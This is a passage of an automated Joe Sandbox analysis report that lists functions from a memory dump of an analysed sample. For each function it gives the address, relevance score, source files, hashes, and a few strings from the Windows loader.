                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID: DebugPrintTimes
                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                        • API String ID: 3446177414-161242083
                                        • Opcode ID: 3275288c97f655ab4c7f5980de1a86416d9de482bc39d448532d78aaa3b6ac3a
                                        • Instruction ID: 4ede82920edd4f5e9ade6dbf2ef96445f3134cd7b396175e537ae5197cd939cd
                                        • Opcode Fuzzy Hash: 3275288c97f655ab4c7f5980de1a86416d9de482bc39d448532d78aaa3b6ac3a
                                        • Instruction Fuzzy Hash: E371CD74A013099FEB09DF68C880BAEB7F8EF48708F15846DE941A7255E774AD82CB50
                                        Function 329158E0 Relevance: 5.7, APIs: 2, Strings: 1, Instructions: 494COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: @
                                        • API String ID: 0-2766056989
                                        • Opcode ID: 8f4d11bfa156184b6db464af1746fbce393cad5d60415c573460fca938e586b6
                                        • Instruction ID: 9be5a9886b64750ab8535d07986913f22c4a5e9d07da05857d8d4d1155a3924c
                                        • Opcode Fuzzy Hash: 8f4d11bfa156184b6db464af1746fbce393cad5d60415c573460fca938e586b6
                                        • Instruction Fuzzy Hash: 81322474D0036D9FEB25CF66C984BD9BBB4BF08304F0181E9D549A7281DBB5AA84CF91
                                        Function 32944B79 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 164COMMON
                                        Download Yara Rule
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000008.00000002.79194682285.00000000328E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 328E0000, based on PE: true
                                        • Associated: 00000008.00000002.79194682285.0000000032A09000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        • Associated: 00000008.00000002.79194682285.0000000032A0D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_8_2_328e0000_fJuwM4Bwi7.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID: 0$Flst
                                        • API String ID: 0-758220159
                                        • Opcode ID: 38e4fda4a09a8590d85de150bffa87608d0418be6c1b4450c921a8f12e90e6fe
                                        • Instruction ID: a6e37f3ee69411f60d0463272e927ef6f7a33de114630d79a0bdd72660c3d5f7
                                        • Opcode Fuzzy Hash: 38e4fda4a09a8590d85de150bffa87608d0418be6c1b4450c921a8f12e90e6fe
                                        • Instruction Fuzzy Hash: 76519CB5E00249CBEB14CF94C48479DFBF8EF44759F58942ED4099B240EB709A86CB50